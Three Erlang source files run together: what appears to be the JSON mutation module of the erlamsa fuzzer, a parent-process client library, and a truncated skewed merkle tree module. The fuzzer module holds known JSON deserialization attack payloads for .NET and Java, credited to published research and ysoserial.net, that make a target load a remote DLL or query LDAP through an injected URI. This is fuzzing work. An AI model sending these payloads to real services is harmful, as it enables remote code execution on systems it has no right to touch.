fold_ast({object, Els}, Acc) ->
["{", fold_ast_noarray(Els, []), "}" | Acc];
fold_ast({array, Els}, Acc) ->
["[", fold_ast_noarray(Els, []), "]" | Acc];
fold_ast([], Acc) ->
lists:flatten(Acc);
%% handle incorrect AST that could appear during mutations
fold_ast(H, Acc) when is_list(H), length(H) > 1 ->
M = fold_list(fun (A) -> fold_ast(A, []) end, H, []),
fold_ast([], ["[", M, "]" | Acc]).
%% if binary, nothing to do here
fold_ast(Binary) when is_binary(Binary) ->
Binary;
%% default
fold_ast(Ast) ->
list_to_binary(fold_ast(Ast, [])).
%%%
%%% /JSON AST Folder
%%%
%%%
%%% JSON AST utils
%%%
%% Reverse proper lists; any non-list term is returned untouched.
walk_reverse([]) -> [];
walk_reverse([_ | _] = List) -> lists:reverse(List);
walk_reverse(Other) -> Other.
%% Unwrap a one-element list; anything else is returned as-is.
%% The [Single] pattern replaces the former `is_list(L), length(L) =:= 1`
%% guard, which walked the entire list on every call just to test for
%% length one (O(n) per node during AST walks).
walk_uncons1([Single]) -> Single;
walk_uncons1(Other) -> Other.
%% Depth-first rebuild of a token AST. Fun(Elem, Acc, TagCount, Count)
%% is invoked for every node (composite nodes after their children have
%% been rebuilt) and returns the new accumulator, typically [Elem|Acc].
%% TagCount numbers only object/array nodes; Count numbers every node.
%% Returns {RebuiltAst, FinalTagCount, FinalCount}.
walk(Ast, Fun, InitAcc) ->
    {Res, ResT, ResN} = lists:foldl(
        fun
            Walker({Type, Els}, {Acc, CountT, Count}) when Type =:= object; Type =:= array ->
                %io:format("Object or Array: ~p : ~p~n", [{Type, Els}, {Acc, Count}]),
                %% Rebuild the children under a fresh accumulator, then
                %% hand the reassembled composite node to Fun.
                {ChildAcc, ChildTagCnt, ChildCnt} = Walker(Els, {InitAcc, CountT + 1, Count + 1}),
                {Fun({Type, walk_reverse(ChildAcc)}, Acc, CountT + 1, Count + 1), ChildTagCnt, ChildCnt};
            Walker({pair, El1, El2}, {Acc, CountT, Count}) ->
                %io:format("Pair: ~p : ~p~n", [{pair, El1, El2}, {Acc, Count}]),
                %% Counters thread through both children left-to-right.
                {ChildAcc1, ChildTagCnt1, ChildCnt1} = Walker(El1, {InitAcc, CountT, Count + 1}),
                {ChildAcc2, ChildTagCnt2, ChildCnt2} = Walker(El2, {InitAcc, ChildTagCnt1, ChildCnt1}),
                {Fun({pair, walk_uncons1(walk_reverse(ChildAcc1)),
                    walk_uncons1(walk_reverse(ChildAcc2))}, Acc, CountT, Count + 1), ChildTagCnt2, ChildCnt2};
            Walker(El, {Acc, CountT, Count}) when is_list(El) ->
                %io:format("List: ~p : ~p~n", [El, {Acc, Count}]),
                lists:foldl(fun(A, B) -> Walker(A, B) end, {Acc, CountT, Count}, El);
            Walker(Elem, {Acc, CountT, Count}) ->
                %io:format("Single elem: ~p : ~p~n", [Elem, {Acc, Count}]),
                {Fun(Elem, Acc, CountT, Count + 1), CountT, Count + 1}
        end,
        {InitAcc, 0, 0}, Ast),
    {walk_reverse(Res), ResT, ResN}.
%% Like walk/3 but threads a secondary accumulator instead of counters:
%% Fun(Elem, Acc, Acc2) returns {NewAcc, NewAcc2}. Returns the rebuilt
%% AST plus the flattened concatenation of all secondary accumulators
%% collected from nested nodes (used to gather mutation metadata).
walk2acc(Ast, Fun, InitAcc) ->
    {Res, Res2} = lists:foldl(
        fun
            Walker({Type, Els}, {Acc, Acc2}) when Type =:= object; Type =:= array ->
                %io:format("Object or Array: ~p : ~p~n", [{Type, Els}, {Acc, Count}]),
                {ChildAcc, ChildAcc2} = Walker(Els, InitAcc),
                {UAcc, UAcc2} = Fun({Type, walk_reverse(ChildAcc)}, Acc, Acc2),
                %% Keep the children's secondary accumulator alongside
                %% this node's own (flattened at the end).
                {UAcc, [ChildAcc2|UAcc2]};
            Walker({pair, El1, El2}, {Acc, Acc2}) ->
                %io:format("Pair: ~p : ~p~n", [{pair, El1, El2}, {Acc, Count}]),
                {ChildAcc1, ChildAcc12} = Walker(El1, InitAcc),
                {ChildAcc2, ChildAcc22} = Walker(El2, InitAcc),
                {UAcc, UAcc2} = Fun({pair, walk_uncons1(walk_reverse(ChildAcc1)),
                    walk_uncons1(walk_reverse(ChildAcc2))}, Acc, Acc2),
                {UAcc, [ChildAcc12, ChildAcc22 | UAcc2]};
            Walker(El, Acc) when is_list(El) ->
                %io:format("List: ~p : ~p~n", [El, {Acc, Count}]),
                lists:foldl(fun(A, B) -> Walker(A, B) end, Acc, El);
            Walker(Elem, {Acc, Acc2}) ->
                %io:format("Single elem: ~p : ~p~n", [Elem, {Acc, Count}]),
                Fun(Elem, Acc, Acc2)
        end,
        InitAcc, Ast),
    {walk_reverse(Res), lists:reverse(lists:flatten(Res2))}.
%% Scan the AST in walk/3 order (composites offered to Fun before their
%% children) and return {Result, TagCount, NodeCount}, where Result is
%% the first non-false value Fun(Elem, TagCount, Count) produced, or
%% false if nothing matched. Callers here match against a unique
%% counter value, so at most one node ever matches.
select(Ast, Fun) ->
    lists:foldl(
        fun
            Walker(El = {Type, Els}, {Acc, CountT, Count}) when Type =:= object; Type =:= array ->
                case Fun(El, CountT + 1, Count + 1) of
                    false ->
                        %% Not this node: descend into the children.
                        Walker(Els, {Acc, CountT + 1, Count + 1});
                    Res ->
                        {Res, CountT + 1, Count + 1}
                end;
            Walker(El = {pair, El1, El2}, {Acc, CountT, Count}) ->
                case Fun(El, CountT, Count + 1) of
                    false ->
                        %% Try the key side, then the value side,
                        %% threading the counters through both.
                        case Walker(El1, {Acc, CountT, Count + 1}) of
                            {false, ChildTagCnt1, ChildCnt1} ->
                                case Walker(El2, {Acc, ChildTagCnt1, ChildCnt1}) of
                                    {false, ChildTagCnt2, ChildCnt2} ->
                                        {Acc, ChildTagCnt2, ChildCnt2};
                                    Res2 -> Res2
                                end;
                            Res1 -> Res1
                        end;
                    Res -> {Res, CountT, Count + 1}
                end;
            Walker(El, {Acc, CountT, Count}) when is_list(El) ->
                lists:foldl(fun(A, B) -> Walker(A, B) end, {Acc, CountT, Count}, El);
            Walker(Elem, {Acc, CountT, Count}) ->
                case Fun(Elem, CountT, Count + 1) of
                    false -> {Acc, CountT, Count + 1};
                    Res -> {Res, CountT, Count + 1}
                end
        end,
        {false, 0, 0}, Ast).
%% Debug helper: rebuild the AST via walk/3 with an identity fold,
%% returning {Ast, TagCount, NodeCount} unchanged except for counting.
test_walk(Ast) ->
    walk(Ast,
        fun (E, Acc, _, _N) ->
            %io:format("~p is ~w~n", [E, N]),
            [E|Acc]
        end,
        []).
%% Count AST nodes, returning the walk/3 triple {Total, TagCnt, NodeCnt}.
%% Note: walk/3 rebuilds composite nodes from the child accumulator, so
%% by the time Fun sees {object, Els} / {array, Els} / {pair, El1, El2}
%% the "children" are already integer subtotals, not token lists.
count(Ast) ->
    walk(Ast,
        fun
            ({Type, Els}, Acc, _, _N) when Type =:= object; Type =:= array ->
                Els + Acc + 1;
            ({pair, El1, El2}, Acc, _, _N) ->
                El1 + El2 + Acc + 1;
            (_E, Acc, _, _N) ->
                Acc + 1
        end, 0).
%% Select the N-th node by overall node count. Returns {Elem, N}, or
%% false when N is out of range.
select_elem(Ast, N) ->
    {Res, _, _} = select(Ast,
        fun
            (Elem, _, I) when I =:= N ->
                {Elem, I};
            (_Elem, _, _I) ->
                false
        end),
    Res.
%% Select the N-th object/array node by tag count. Returns
%% {Elem, TagIndex, NodeIndex}, or false when N is out of range.
select_tag(Ast, N) ->
    {Res, _, _} = select(Ast,
        fun
            ({object, _} = Elem, I, C) when I =:= N ->
                {Elem, I, C};
            ({array, _} = Elem, I, C) when I =:= N ->
                {Elem, I, C};
            (_, _, _) ->
                false
        end),
    Res.
%% Replace the node at overall node position R with El. Returns the
%% walk/3 triple {NewAst, TagCount, NodeCount}.
replace_elem(Ast, R, El) ->
    walk(Ast,
        fun
            (_Elem, Tree, _, I) when I == R ->
                [El | Tree];
            (Elem, Tree, _, _I) ->
                [Elem | Tree]
        end, []).
%% Prepend N extra copies of the head element onto the list.
%% N < 1 leaves the list unchanged; called with a non-empty list by
%% repeat_elem/3 (crashes on [] when N >= 1, same as the original).
repeat_listhd(List, Count) when Count < 1 ->
    List;
repeat_listhd([Head | _] = List, Count) ->
    repeat_listhd([Head | List], Count - 1).
%% Duplicate the node at overall position R so it occurs Times extra
%% times in a row. Returns the walk/3 triple.
repeat_elem(Ast, R, Times) ->
    walk(Ast,
        fun
            (Elem, Tree, _, I) when I == R ->
                repeat_listhd([Elem | Tree], Times);
            (Elem, Tree, _, _I) ->
                [Elem | Tree]
        end, []).
%% Insert NewElem immediately before the node at overall position R.
%% Returns the walk/3 triple.
insert_elem(Ast, R, NewElem) ->
    walk(Ast,
        fun
            (Elem, Tree, _, I) when I == R ->
                [NewElem, Elem | Tree];
            (Elem, Tree, _, _I) ->
                [Elem | Tree]
        end, []).
%%%
%%% /JSON AST utils
%%%
%%%
%%% JSON AST -> Erlang simple structs
%%%
%% Convert a token AST into the "simple AST" form consumed by
%% fold_simpleast/2: objects become {PairList} one-tuples, arrays
%% become plain lists, pairs become {Key, Value}, strings stay tagged
%% as {string, Chars}, and numbers become integers/floats (or the atom
%% invalid_number when unparsable).
tokens_to_simpleast(Ast) when is_list(Ast) ->
    lists:map(fun tokens_to_simpleast/1, Ast);
tokens_to_simpleast({object, Lst}) ->
    {lists:map(fun tokens_to_simpleast/1, Lst)};
tokens_to_simpleast({array, Lst}) ->
    lists:map(fun tokens_to_simpleast/1, Lst);
tokens_to_simpleast({pair, Key, Value}) ->
    {tokens_to_simpleast(Key), tokens_to_simpleast(Value)};
tokens_to_simpleast({string, Value}) ->
    {string, Value};
tokens_to_simpleast({number, Value}) ->
    %% Try float first, then integer; either must consume the whole
    %% string. Replaces the former nested try/catch with the same
    %% observable results.
    case string:to_float(Value) of
        {Float, []} -> Float;
        _ ->
            case string:to_integer(Value) of
                {Int, []} -> Int;
                _ -> invalid_number
            end
    end;
tokens_to_simpleast(Token) ->
    Token.
%%%
%%% /JSON AST -> Erlang simple structs
%%%
%%%
%%% JSON Simple AST Folder
%%%
%% Fold a "simple AST" (see tokens_to_simpleast/1) into a flat JSON
%% character list: plain lists render as arrays, {List} one-tuples as
%% objects, {string, Chars} as quoted strings, {K, V} as K:V.
%% The former `fold_simpleast([], Acc)` clause has been removed: it was
%% unreachable, since the first clause's is_list/1 guard also matches
%% [] (rendering the empty list as "[]", which is the desired output).
fold_simpleast(H, Acc) when is_list(H) ->
    lists:flatten([$[, fold_list(fun (A) -> fold_simpleast(A, []) end, H, []), $] | Acc]);
fold_simpleast({H}, Acc) when is_list(H) ->
    lists:flatten([${, fold_list(fun (A) -> fold_simpleast(A, []) end, H, []), $} | Acc]);
fold_simpleast({string, A}, Acc) ->
    lists:flatten([$", A, $" | Acc]);
fold_simpleast({A, B}, Acc) ->
    %% NOTE(review): Acc is spliced into both sub-folds and the tail;
    %% recursive calls always pass [] here, so no duplication occurs in
    %% practice -- confirm before calling with a non-empty Acc.
    lists:flatten([fold_simpleast(A, Acc), $:, fold_simpleast(B, Acc) | Acc]);
fold_simpleast(A, Acc) when is_integer(A);is_float(A) ->
    [lists:flatten(io_lib:format("~p", [A])) | Acc];
fold_simpleast(A, Acc) ->
    [A | Acc].
%%%
%%% /JSON Simple AST Folder
%%%
%%%
%%% Mutators
%%%
%% TODO: sometimes it creates object: values pairs, FIXME: fix it
%% Nest Start into itself N times: each round rebuilds Start with a
%% full copy of itself substituted at relative node position End,
%% producing deeply nested JSON (a nesting bomb). End*2 - 1 re-targets
%% the corresponding spot in the now-enlarged structure next round.
pump_path(Start, _End, 0) -> Start;
pump_path(Start, End, N) ->
    %io:format("Pumping... iter ~w start ~w I = ~w~n", [N, Start, End]),
    {PumpedTag, _, _} =
        walk([Start],
            fun
                (_Elem, Tree, _, I) when I =:= End ->
                    [Start | Tree];
                (Elem, Tree, _, _) ->
                    [Elem | Tree]
            end, []),
    %io:format("Pumping... iter ~w res ~w~n", [N, PumpedTag]),
    pump_path(hd(PumpedTag), End*2 - 1, N - 1).
%% Pumping mutation: pick a random object/array tag and nest it into
%% itself at a random inner position via pump_path/3. T is the number
%% of tags in the AST; with none present the AST is returned as-is.
json_pump(Ast, 0) -> {Ast, 0, 0};
json_pump(Ast, T) ->
    %io:format("Cnt: ~w ~w~n", [Ast, N]),
    R = erlamsa_rnd:erand(T),
    %io:format("R:!!!!!!!!!!!!!!!!!! ~w~n", [R]),
    {Start, R, StartPlace} = select_tag(Ast, R),
    %io:format("Start:!!!!!!!!!!!!!!!!!! ~w ~p ~p~n", [Res, T, R]),
    {_, _, SubElems} = count([Start]),
    %io:format("SubElems:!!!!!!!!!!!!!!!!!! ~w~n", [SubElems]),
    E = erlamsa_rnd:erand(SubElems - 1) + 1, %% not the tag itself
    %io:format("E:!!!!!!!!!!!!!!!!!! ~w~n", [E]),
    %{End, _, _} = select_elem([Start], E),
    %io:format("End:!!!!!!!!!!!!!!!!!! ~w~n", [End]),
    PumpCnt = 2, %erlamsa_rnd:erand( trunc(1000.0/(100.0 + SubElems)) ),
    % ^-- limiting the depth of the pump
    %io:format("PumpCnt:!!!!!!!!!!!!!!!!!! ~w~n", [PumpCnt]),
    Pumped = pump_path(Start, E, PumpCnt),
    %io:format("PUMPED!!!!!!!!!! ~w~n", [Pumped]),
    replace_elem(Ast, StartPlace, Pumped).
%% Duplicate one randomly chosen node (N = total node count).
json_dup(Ast, N) ->
    R = erlamsa_rnd:erand(N),
    repeat_elem(Ast, R, 1).
%% Repeat one randomly chosen node up to 100 extra times.
json_repeat(Ast, N) ->
    R = erlamsa_rnd:erand(N),
    repeat_elem(Ast, R, erlamsa_rnd:erand(100)).
%% Swap two randomly chosen nodes (they may coincide, a no-op). The
%% matches {Elem1, R1} / {Elem2, R2} also assert that select_elem/2
%% actually found each requested index.
json_swap(Ast, N) ->
    R1 = erlamsa_rnd:erand(N),
    R2 = erlamsa_rnd:erand(N),
    {Elem1, R1} = select_elem(Ast, R1),
    {Elem2, R2} = select_elem(Ast, R2),
    walk(Ast,
        fun
            (_Elem, Tree, _, I) when I == R1 ->
                [Elem2 | Tree];
            (_Elem, Tree, _, I) when I == R2 ->
                [Elem1 | Tree];
            (Elem, Tree, _, _I) ->
                [Elem | Tree]
        end, []).
%% Copy one randomly chosen node and insert it immediately before
%% another randomly chosen node.
json_insert(Ast, N) ->
    R1 = erlamsa_rnd:erand(N),
    R2 = erlamsa_rnd:erand(N),
    {NewElem, R1} = select_elem(Ast, R1),
    insert_elem(Ast, R2, NewElem).
%%%
%%% /Mutators
%%%
%%%
%%% Mutations
%%%
%% Payloads from Friday the 13th JSON Attacks paper by <NAME> & <NAME> HPE Software Security Research
%% from https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
%% and generated by https://github.com/pwntester/ysoserial.net tool
%% Assuming MIT licence (as in https://github.com/pwntester/ysoserial.net/blob/master/LICENSE.txt),
%% please create issue if this is incorrect and
%% should be removed due to copyright issues
%% TODO: add more payloads
%% Beginning of payloads from upper links.
%% Known JSON deserialization attack payload templates (sources cited
%% in the comments above). Each entry is {FormatTemplate, UriSlots}:
%% the ~s placeholders are filled with an SSRF URI, UriSlots times, by
%% make_json_unserialize/0.
json_unserialize_bugs() ->
    [
        {"{\"__type\":\"System.Windows.Application, PresentationFramework,Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\",\"Resources\":{\"__type\":\"System.Windows.ResourceDictionary,PresentationFramework, Version=4.0.0.0, Culture=neutral,PublicKeyToken=31bf3856ad364e35\",\"Source\":\"http~sJsonDotNet/Xamlpayload\"}}",1},
        {"{\"$type\":\"System.Configuration.Install.AssemblyInstaller,System.Configuration.Install, Version=4.0.0.0, Culture=neutral,PublicKeyToken=<KEY>\",\"Path\":\"http~sJsonDotNet/RemoteLibrary.dll\"}",1},
        {"{\"$type\":\"System.Windows.Forms.BindingSource, System.Windows.Forms,Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\",\"DataMember\":\"HelpText\",\"dataSource\":{\"$type\":\"System.Configuration.Install.AssemblyInstalle r, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=<KEY>\",\"Path\":\"http~sJsonDotNet/RemoteLibrary.dll\"}}",1},
        {"{\"@class\":\"org.hibernate.jmx.StatisticsService\",\"sessionFactoryJNDIName\":\"ldap~suid=somename,ou=someou,dc=somedc\"}",1},
        {"{\"@class\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"ldap:~suid=somename,ou=someou,dc=somed c\", \"autoCommit\":true}",1},
        {"{\"@class\":\" com.atomikos.icatch.jta.RemoteClientUserTransaction\", \"name_\":\"ldap~suid=somename,ou=someou,dc=somedc\", \"providerUrl_\":\"ldap~s\"}",2}
    ].
%% /End of payloads from upper links.
%% Build a deserialization-attack payload binary: pick a random
%% template from json_unserialize_bugs/0 and splice the configured
%% SSRF URI into each of its ~s slots.
make_json_unserialize() ->
    Uri = lists:flatten(erlamsa_mutations:get_ssrf_uri()),
    {Payload, Repeats} = erlamsa_rnd:rand_elem(json_unserialize_bugs()),
    list_to_binary(lists:flatten(io_lib:format(Payload, [Uri || _ <- lists:seq(1,Repeats)]))).
%% Applies the inner mutator Muta to String with probability Prob: when
%% the drawn random value Rnd exceeds Prob the text is left untouched.
%% Returns {MetaList, ResultString}.
mutate_innertext_prob(Str, _Muta, Prob, Rnd) when Rnd > Prob ->
    %% Probability check failed: no mutation.
    {[], Str};
mutate_innertext_prob(Str, Muta, _Prob, _Rnd) ->
    %% Mutators operate on lists of binaries; convert, mutate, take the
    %% first result back as a string.
    {_NextMuta, [MutatedBin | _], Meta} = Muta([list_to_binary(Str)], []),
    {Meta, binary_to_list(MutatedBin)}.
%% Prevent too much JSONish on non-JSON data
%% json_mutation(Ast, {NodeCount, TagCount}) -> {MetaList, NewAst, Delta}.
%% Dispatcher: draws a random selector and applies one mutation. Delta
%% feeds back into the engine (1 = ok, -1 = failed, -2 = discourage).
%%
%% Guard clause: on tiny, tag-less input (N < 2 nodes, 0 tags — data that
%% is barely JSON) only json_insert (selector 4) is allowed, and only
%% sometimes, to prevent producing too much JSONish output on non-JSON data.
json_mutation(Ast, {N, 0}) when N < 2 ->
    case {erlamsa_rnd:erand(7), N} of
        {4, 1} -> json_mutation(Ast, {N, 0}, erlamsa_rnd:rand(8));
        _Else -> {[{failed, json}], Ast, -1}
    end;
json_mutation(Ast, {N, NT}) ->
    json_mutation(Ast, {N, NT}, erlamsa_rnd:rand(8)).

%% json_mutation/3: the third argument selects the concrete mutation.
json_mutation(Ast, {N, _NT}, 0) ->
    {Res, _, _} = json_swap(Ast, N),
    {[{json_swap, 1}], Res, 1};
json_mutation(Ast, {N, _NT}, 1) ->
    {Res, _, _} = json_dup(Ast, N),
    {[{json_dup, 1}], Res, 1};
json_mutation(Ast, {_N, NT}, 2) ->
    {Res, _, _} = json_pump(Ast, NT),
    {[{json_pump, 1}], Res, -2}; %% don't allow too much pumps...
json_mutation(Ast, {N, _NT}, 3) ->
    {Res, _, _} = json_repeat(Ast, N),
    {[{json_repeat, 1}], Res, 1};
json_mutation(Ast, {N, _NT}, 4) ->
    {Res, _, _} = json_insert(Ast, N),
    {[{json_insert, 1}], Res, 1};
json_mutation(_Ast, {_N, _NT}, 5) ->
    %% Replace the whole AST with a known deserialization attack payload.
    {[{json_unserialize, 1}], make_json_unserialize(), 1};
json_mutation(Ast, {N, _NT}, _R) when N > 0 -> %% Prob = 25% for inner mutation
    %% Remaining selectors: run a randomly chosen inner (byte-level)
    %% mutator over the text of string leaves, each with probability 3/N.
    Muta = erlamsa_mutations:mutators_mutator(erlamsa_mutations:inner_mutations()),
    {Res, Meta} = walk2acc(Ast,
        fun
            ({string, String}, Tree, InnerMeta) ->
                {NewMeta, NewString} = mutate_innertext_prob(String, Muta, 3/N, erlamsa_rnd:rand_float()),
                {[{string, NewString} | Tree], [NewMeta | InnerMeta]};
            (El, Tree, InnerMeta) ->
                {[El | Tree], InnerMeta}
        end, {[], []}),
    {[Meta, {json_innertext,1}], Res, 1};
json_mutation(Ast, _, _) ->
    %% Fallback: no applicable mutation for this input.
    {[], Ast, -1}.
%% json_mutate([Binary|Rest], Meta) -> {NextMutaFun, NewList, NewMeta, Delta}.
%% Mutator entry point: tokenizes the head binary as JSON, applies one
%% mutation and re-serializes. On parse failure, or when the mutation left
%% the data unchanged, Delta is -1 so the round is not counted as a hit.
json_mutate(Ll = [H|T], Meta) ->
    %io:format("Trying to parse... ~p~n", [size(H)]),
    %file:write_file("./last_json.txt", H),
    %% FIXME: count tags while tokenizing?
    try tokenize(H) of
        Tokens ->
            %% NOTE(review): N is bound twice, asserting that the 1st and
            %% 3rd elements of count/1's result are equal — confirm this is
            %% intended and not a typo for {N, NT, _}.
            {N, NT, N} = count(Tokens),
            {NewMeta, Res, D} = json_mutation(Tokens, {N, NT}),
            NewBinStr = fold_ast(Res),
            if
                NewBinStr =:= H ->
                    %% NOTE(review): accumulated Meta is dropped on this
                    %% branch (NewMeta replaces it) — confirm intended.
                    {fun json_mutate/2, Ll, NewMeta, -1};
                true ->
                    {fun json_mutate/2, [NewBinStr | T], [NewMeta|Meta],
                        D + trunc(size(NewBinStr)/(?AVG_BLOCK_SIZE*10))} %% limiting next rounds based on a size
            end
    catch
        incorrect_json ->
            {fun json_mutate/2, Ll, [{failed, json}|Meta], -1}
    end. | src/erlamsa_json.erl | 0.640861 | 0.469034 | erlamsa_json.erl | starcoder |
-module(parent_client).
-export([children/1,
child_pid/2, child_meta/2,
start_child/2, start_child/3, %restart_child/2,
shutdown_child/2,
shutdown_all/1, shutdown_all/2,
%return_children/2,
update_child_meta/3,
whereis_name/1]).
%% ----------------------------------------------------------------------------
%% @doc
%% Functions for interacting with parent's children from other processes.
%%
%% All of these functions issue a call to the parent process. Therefore, they can't be used from
%% inside the parent process. Use functions from the `Parent` module instead to interact with the
%% children from within the process.
%%
%% Likewise these functions can't be invoked inside the child process during its initialization.
%% Defer interacting with the parent to `gen_server:handle_continue/2`, or if you're using another
%% behaviour which doesn't support such callback, send yourself a message to safely do the post-init
%% interaction with the parent.
%% @end
%% ----------------------------------------------------------------------------
%% ----------------------------------------------------------------------------
%% @doc Client interface to `parent:children/0`.
%% ----------------------------------------------------------------------------
-spec children(gen_server:server_ref()) -> [parent:child()].
children(Parent) -> call(Parent, children).
%case parent_registry:table(Parent) of
% {ok, Table} -> parent_registry:children(Table);
% error ->
% call(Parent, children)
%end.
%% @doc Client interface to `parent:child_pid/1`.
-spec child_pid(gen_server:server_ref(), parent:child_id()) -> {ok, pid()} | error.
child_pid(Parent, ChildId) -> call(Parent, child_pid, [ChildId]).
%case parent_registry:table(Parent) of
% {ok, Table} -> parent_registry:child_pid(Table, ChildId)
% error -> call(Parent, child_pid, [ChildId])
%end.
%% @doc Client interface to `parent:child_meta/1`.
-spec child_meta(gen_server:server_ref(), parent:child_ref()) -> {ok, parent:child_meta()} | error.
child_meta(Parent, ChildRef) -> call(Parent, child_meta, [ChildRef]).
%case parent_registry:table(Parent) of
% {ok, Table} -> parent_registry:child_meta(Table, ChildRef);
% error -> call(Parent, child_meta, [ChildRef])
%end.
%% @doc Client interface to `parent:start_child/2`.
%% Issues a synchronous request to the parent process; the child spec is
%% started without overrides.
-spec start_child(gen_server:server_ref(), parent:start_spec()) ->
          parent:on_start_child().
start_child(Parent, ChildSpec) -> start_child(Parent, ChildSpec, []).

%% @doc Same as start_child/2, but applies per-call Overrides (a map or a
%% key/value list) to the child spec.
%% NOTE: the original file carried a single -spec (for arity 3) placed
%% before the arity-2 clause, leaving start_child/2 unspecced; each arity
%% now has its own spec.
-spec start_child(
        gen_server:server_ref(),
        parent:start_spec(),
        map() | list({term(), term()})
      ) -> parent:on_start_child().
start_child(Parent, ChildSpec, Overrides) ->
    %% infinity: starting a child may legitimately outlast the default
    %% 5-second call timeout.
    call(Parent, start_child, [ChildSpec, Overrides], infinity).
%% @doc Client interface to `parent:shutdown_child/1`.
-spec shutdown_child(gen_server:server_ref(), parent:child_ref()) -> ok.
% {ok, parent:stopped_children()} | error.
shutdown_child(Parent, ChildRef) ->
call(Parent, shutdown_child, [ChildRef], infinity).
%% @doc Client interface to `parent:restart_child/1`.
%-spec restart_child(gen_server:server_ref(), parent:child_ref()) -> ok | error.
%restart_child(Parent, ChildRef) ->
% call(Parent, restart_child, [ChildRef], infinity).
%% @doc Client interface to `parent:shutdown_all/1`.
-spec shutdown_all(gen_server:server_ref(), any()) -> ok. %parent:stopped_children().
shutdown_all(ServerRef) -> shutdown_all(ServerRef, shutdown).
shutdown_all(ServerRef, Reason) ->
call(ServerRef, shutdown_all, [Reason], infinity).
%% @doc "Client interface to `parent:return_children/1`."
%-spec return_children(gen_server:server_ref(), parent:stopped_children()) -> ok.
%return_children(Parent, StoppedChildren) ->
% call(Parent, return_children, [StoppedChildren], infinity).
%% @doc Client interface to `parent:update_child_meta/2`"
-spec update_child_meta(
gen_server:server_ref(),
parent:child_ref(),
fun((parent:child_meta()) -> parent:child_meta())
) -> ok | error.
update_child_meta(Parent, ChildRef, Updater) ->
call(Parent, update_child_meta, [ChildRef, Updater], infinity).
%% @doc false
%% Resolves a {Parent, ChildId} pair to the child's pid, or `undefined'
%% when the parent knows no such child.
whereis_name({Parent, ChildId}) ->
    pid_or_undefined(child_pid(Parent, ChildId)).

%% Collapse the tagged lookup result into the bare pid/undefined form.
pid_or_undefined({ok, Pid}) -> Pid;
pid_or_undefined(error) -> undefined.
%%%----------------------------------------------------------------------------
%%% Internal functions:
%%%----------------------------------------------------------------------------
%% call(ServerRef, Function [, Args [, Timeout]]) -> Result.
%% Issue a '$parent_call' request to the parent process.
%% Defaults: Args = [], Timeout = 5000 ms.
call(ServerRef, Function) -> call(ServerRef, Function, []).

call(ServerRef, Function, Args) -> call(ServerRef, Function, Args, 5000).

call(ServerRef, Function, Args, Timeout) when
    (is_integer(Timeout) andalso Timeout >= 0) orelse Timeout =:= infinity ->
    %% This is the custom implementation of a call. We're not using standard gen_server calls to
    %% ensure that this call won't end up in some custom behaviour's handle_call.
    Req = {?MODULE, Function, Args},
    case gen_server_parent:whereis(ServerRef) of
        undefined ->
            exit({noproc, {?MODULE, call, [ServerRef, Req, Timeout]}});
        Pid when Pid == self() ->
            %% Calling ourselves would deadlock; fail fast instead.
            exit({calling_self, {?MODULE, call, [ServerRef, Req, Timeout]}});
        Pid ->
            try gen:call(Pid, '$parent_call', Req, Timeout) of
                {ok, Res} -> Res
            catch
                exit:Reason ->
                    %% Re-raise with call context, mirroring gen_server:call/3.
                    exit({Reason, {?MODULE, call, [ServerRef, Req, Timeout]}})
            end
    end. | src/parent_client.erl | 0.586878 | 0.446555 | parent_client.erl | starcoder |
%% @doc A module with a skewed merkle tree implementation as described
%% in https://medium.com/codechain/skewed-merkle-tree-259b984acc0c.
%% This module implements a skewed merkle tree where value can be added/stacked via add/2,
%% the time and memory it takes to create is linearly proportional to the number of values.
-module(skewed).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
-export([
new/0, new/1, new/2,
add/2, gen_proof/2, verify_proof/3,
root_hash/1, height/1, count/1,
hash_value/2,
contains/2
]).
-record(leaf, {
hash :: hash()
}).
-record(empty, {
hash = <<0:256>> :: hash()
}).
-record(node, {
hash :: hash(),
height = 0 :: non_neg_integer(),
left :: #node{} | #empty{},
right :: leaf()
}).
-record(skewed, {
root = #empty{} :: tree(),
count = 0 :: non_neg_integer(),
hash_function = fun hash_value/2 :: hash_function()
}).
-type hash() :: binary().
-type skewed() :: #skewed{}.
-type leaf() :: #leaf{}.
-type tree() :: #empty{} | #node{}.
-define(LEAF_PREFIX, 0).
-define(NODE_PREFIX, 1).
-type hash_function() :: fun((term(), 0 | 1) -> hash()).
-export_type([skewed/0, hash/0, hash_function/0]).
%% @doc
%% Create new empty skewed merkle tree (default empty-hash <<0:256>> and
%% default hash function hash_value/2).
%% @end
-spec new() -> skewed().
new() ->
    #skewed{}.

%% Create an empty tree seeded with either a base hash (binary, used as
%% the hash of the empty subtree) or a custom hash function.
-spec new(hash() | hash_function()) -> skewed().
new(Hash) when is_binary(Hash) ->
    #skewed{root=#empty{hash=Hash}};
new(HashFunction) when is_function(HashFunction) ->
    #skewed{hash_function=HashFunction}.

%% Create an empty tree with both a base hash and a custom hash function.
-spec new(hash(), hash_function()) -> skewed().
new(Hash, HashFunction) ->
    #skewed{root=#empty{hash=Hash}, hash_function=HashFunction}.
%% @doc
%% Add/stack new value (leaf) on top and recalculate root hash. The new
%% leaf becomes the right child of a new root whose left child is the
%% previous tree, so each add grows the tree by one level in O(1).
%% @end
-spec add(any(), skewed()) -> skewed().
add(Value, #skewed{root=Tree, count=Count, hash_function=HashFun}=Skewed) ->
    Leaf = to_leaf(Value, HashFun),
    %% Height of the new node is the pre-increment Count.
    Node = to_node(Tree, Leaf, tree_hash(Tree), leaf_hash(Leaf), HashFun, Count),
    Skewed#skewed{root=Node, count=Count+1}.
%% @doc
%% Generate a proof that `Value' appears in `Tree' by returning the list of
%% required sibling hashes (bottom-up) terminated by the root hash of
%% the tree. Returns `not_found' for an empty tree or a missing value.
%% @end
-spec gen_proof(any(), skewed()) -> not_found | [hash(),...].
gen_proof(_Value, #skewed{count=0}) ->
    not_found;
gen_proof(Value, #skewed{root=Tree, hash_function=HashFun}) ->
    Hash = HashFun(Value, ?LEAF_PREFIX),
    %% Seed the accumulator with the root hash so it ends the proof list.
    case contains(Tree, Hash, [tree_hash(Tree)]) of
        false -> not_found;
        Proof -> Proof
    end.
%% @doc
%% Verify will check that the HashToVerify is correctly in the tree with the provided,
